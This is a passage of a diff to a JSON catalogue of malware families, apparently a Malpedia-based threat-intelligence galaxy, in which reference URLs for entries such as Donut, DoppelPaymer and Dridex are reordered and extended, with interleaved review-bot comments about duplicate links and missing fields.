"description": "Donut is an open-source in-memory injector/loader, designed for execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It was used during attacks against U.S. organisations according to Threat Hunter Team (Symantec) and U.S. Defence contractors (Unit42).\r\nGithub: https://github.com/TheWover/donut",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector",
- "https://thewover.github.io/Introducing-Donut/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us"
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us",
+ "https://thewover.github.io/Introducing-Donut/"
],
"synonyms": [
"Donut"
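Review bot: the new Minodo entry lists the same SecurityIntelligence post twice, `.../ex-conti-fin7-actors-collaborate-new-domino-backdoor/` and the same URL without the trailing slash; keep one. The entry is keyed on `win.domino` but its `synonyms` array is empty, so a search for "Domino" will not match it; add "Domino" as a synonym. The Donut part of the hunk only adds the cocomelonc ref and reorders the rest.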
@@ -20782,7 +22119,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/"
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/",
+ "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry",
+ "https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns"
],
"synonyms": [],
"type": []
@@ -20795,21 +22134,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/",
- "https://redcanary.com/blog/grief-ransomware/",
+ "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/",
"https://inquest.net/blog/2021/12/20/dont-bring-dridex-home-holidays",
- "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true",
"https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware",
- "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
- "https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/",
- "https://cyber-anubis.github.io/malware%20analysis/dridex/",
- "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/",
+ "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
+ "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/dridex-veh-api-obfuscation/",
+ "https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true",
"https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://twitter.com/BrettCallow/status/1453557686830727177?s=20"
+ "https://cyber-anubis.github.io/malware%20analysis/dridex/",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta575-uses-squid-game-lures-distribute-dridex-malware"
],
"synonyms": [],
"type": []
@@ -20822,63 +22161,65 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer",
- "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
- "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/",
- "https://www.ic3.gov/Media/News/2020/201215-1.pdf",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://twitter.com/vikas891/status/1385306823662587905",
- "https://redcanary.com/blog/grief-ransomware/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
- "https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/",
- "http://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
- "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/",
- "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c",
+ "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/",
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer",
+ "https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/",
+ "https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
"https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
"https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding",
- "https://techcrunch.com/2020/03/01/visser-breach/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
+ "https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
"https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://twitter.com/BrettCallow/status/1453557686830727177?s=20",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://techcrunch.com/2020/03/01/visser-breach/",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://www.ic3.gov/Media/News/2020/201215-1.pdf",
+ "https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
"https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html",
- "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer"
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
+ "https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/",
+ "https://redcanary.com/blog/grief-ransomware/",
+ "https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding",
+ "https://twitter.com/vikas891/status/1385306823662587905"
],
"synonyms": [
"Pay OR Grief"
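Review bot: this rewrite of the DoppelPaymer refs keeps several entries that are duplicates in all but URL form: the CrowdStrike `double-trouble-ransomware-data-leak-extortion-part-1` with and without trailing slash, and `secureworks.com/research/threat-profiles/gold-heron` over both http and https. Since the whole list is being regenerated anyway, normalise each source to one URL so the entry does not cite the same page twice. The two genuinely new refs (the BleepingComputer Europol piece and the lka.polizei.nrw press release) look right.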
@@ -20893,10 +22234,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/",
- "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/",
"http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html",
- "https://research.checkpoint.com/dorkbot-an-investigation/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/",
+ "https://research.checkpoint.com/dorkbot-an-investigation/",
+ "https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/"
],
"synonyms": [],
"type": []
@@ -20909,8 +22250,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
],
"synonyms": [],
"type": []
@@ -20918,6 +22259,37 @@
"uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711",
"value": "Dorshel"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dosia",
+ "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/",
+ "https://medium.com/@b42labs/data-insights-from-russian-cyber-militants-noname057-9f4db98f60e",
+ "https://decoded.avast.io/martinchlumecky/ddosia-project-how-noname05716-is-trying-to-improve-the-efficiency-of-ddos-attacks/",
+ "https://www.team-cymru.com/post/a-blog-with-noname"
+ ],
+ "synonyms": [
+ "DDOSIA"
+ ],
+ "type": []
+ },
+ "uuid": "eabd30ed-d2ec-43b5-b790-7381f93a3a03",
+ "value": "Dosia"
+ },
+ {
+ "description": "According to Mandiant, DOSTEALER is a dataminer that mines browser login and cookie data. It is also capable of taking screenshots and logging keystrokes.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dostealer",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3b4bf82d-5c57-4ea2-847d-f2fd292ba730",
+ "value": "DOSTEALER"
+ },
{
"description": "",
"meta": {
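Review bot: the new Dosia entry carries four refs and the synonym "DDOSIA" but an empty `description`, while the DOSTEALER entry added in the same hunk does get a one-liner; for consistency give Dosia a short description drawn from the cited SentinelOne or Avast posts.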
@@ -20938,7 +22310,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback",
- "https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html"
+ "https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/"
],
"synonyms": [],
"type": []
@@ -20952,8 +22325,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy",
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
- "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/",
- "https://twitter.com/Int2e_/status/1294565186939092994"
+ "https://twitter.com/Int2e_/status/1294565186939092994",
+ "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/"
],
"synonyms": [
"VALIDATOR"
@@ -20968,10 +22341,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar",
- "https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
+ "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/",
"https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
"https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit",
- "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/"
+ "https://github.com/countercept/doublepulsar-c2-traffic-decryptor"
],
"synonyms": [],
"type": []
@@ -20984,19 +22357,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.doublezero",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html",
- "https://cert.gov.ua/article/38088",
"https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://www.splunk.com/en_us/blog/security/threat-update-doublezero-destructor.html",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://cert.gov.ua/article/38088",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-doublezero",
+ "https://unit42.paloaltonetworks.com/doublezero-net-wiper/",
+ "https://securelist.com/new-ransomware-trends-in-2022/106457/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
"https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
"https://blog.talosintelligence.com/2022/03/threat-advisory-doublezero.html"
],
"synonyms": [
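Review bot: the added refs contain the same Trustwave article twice, once with a trailing slash (`"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/"`) and once without; normalize the trailing slash before deduplicating so only one copy lands in the list. Most of the other `-`/`+` pairs in this hunk (Trustwave, nextgov, Splunk, cert.gov.ua, CrowdStrike part 1, MSRC) are the same URLs removed and re-added at new positions, so a stable sort of `refs` in the generator would reduce the diff to the genuinely new entries (cip.gov.ua, the Microsoft hybrid-warfare PDF, CrowdStrike part 3, AT&T, YouTube, eSentire, Unit 42, Securelist).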
@@ -21012,25 +22389,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph",
- "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/",
"https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf",
+ "https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html"
],
"synonyms": [
"DELPHACY"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "837a295c-15ff-41c0-9b7e-5f2fb502b00a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2",
"value": "Downdelph"
},
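Review bot: this hunk silently drops the whole `related` array for Downdelph, including the `dest-uuid` `837a295c-15ff-41c0-9b7e-5f2fb502b00a` link tagged `estimative-language:likelihood-probability="almost-certain"`, while the rest of the change is only a reordering of `refs`. If the generator no longer emits `related` for Malpedia entries, say so in the commit message and confirm that the cross-cluster relationship is preserved elsewhere; otherwise the link should be kept, since consumers resolving `dest-uuid` across galaxies will lose it.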
@@ -21053,9 +22421,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper",
- "https://www.infinitumit.com.tr/apt-35/",
+ "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf",
"http://www.clearskysec.com/charmingkitten/",
- "https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
+ "https://www.infinitumit.com.tr/apt-35/"
],
"synonyms": [],
"type": []
@@ -21094,14 +22462,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot",
- "https://community.riskiq.com/article/30f22a00",
- "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122",
+ "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
"https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
+ "https://community.riskiq.com/article/30f22a00",
+ "https://lokalhost.pl/gozi_tree.txt",
"https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality",
"https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
- "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
- "https://lokalhost.pl/gozi_tree.txt"
+ "https://medium.com/csis-techblog/the-end-of-dreambot-a-loved-piece-of-gozi-24cc9bfc8122"
],
"synonyms": [],
"type": []
@@ -21114,131 +22482,125 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex",
- "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://adalogics.com/blog/the-state-of-advanced-code-injections",
- "https://blog.lexfo.fr/dridex-malware.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
- "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://community.riskiq.com/article/2cd1c003",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
+ "https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://www.youtube.com/watch?v=1VB15_HgUkg",
+ "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf",
+ "https://unit42.paloaltonetworks.com/travel-themed-phishing/",
+ "https://cyber-anubis.github.io/malware%20analysis/dridex/",
+ "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
+ "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://github.com/rad9800/talks/blob/main/MALWARE_MADNESS.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://artik.blue/malware3",
+ "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf",
+ "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/",
+ "https://malwarebookreports.com/cryptone-cobalt-strike/",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf",
+ "https://community.riskiq.com/article/e4fb7245",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
